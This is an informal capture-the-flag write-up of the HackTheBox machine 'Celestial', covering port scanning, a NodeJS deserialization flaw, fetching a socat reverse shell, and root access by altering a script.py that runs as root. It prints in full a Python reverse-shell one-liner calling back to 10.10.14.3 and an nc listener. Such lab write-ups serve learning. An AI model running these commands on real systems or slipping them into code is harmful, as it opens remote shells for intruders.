Celestial(10.10.10.85)Hackthebox

Let’s start with a quick NMAP scan to discover open ports

NMAP scan results, port 3000 is open with a Node-js server running. Browsing to http://10.10.10.85:3000

I’m starting the burp suite by capture request while using burp as a proxy.

Decode base64 profile: {“username”:”Dummy”,”country”:”Idk Probably Somewhere Dumb”,”city”:”Lametown”,”num”:”2"}

After some googling for “NodeJS” vulnerabilities, you will come across the following articles for CVE-2017–5941 a NodeJS deserialization vulnerability. (Link here: https://www.exploit-db.com/docs/english/41289-exploiting-node.js-deserialization-bug-for-remote-code-execution.pdf)

I tried to exploit but failed…:((

We use another way to attack.

We use the child_process module which helps us to spawn a new process which in this case is the execution of ping command with exec().

=)) it is work

We need to upload file shell to the remote server…My often way to do this is to use SimpleHTTPServer.

Next step, the following payload will download and execute a socat reverse shell.

Getting shell

So easy, cat user.txt

2. Privilege Escalation

We can use command dowload file LinEnum.sh to the remote server.

We can see a python file script.py

We can modify scipt.py I added the following content:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.3",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

We use command reverse shell: $ nc -v -n -l -p 1234

So easy =)) we can see file root.txt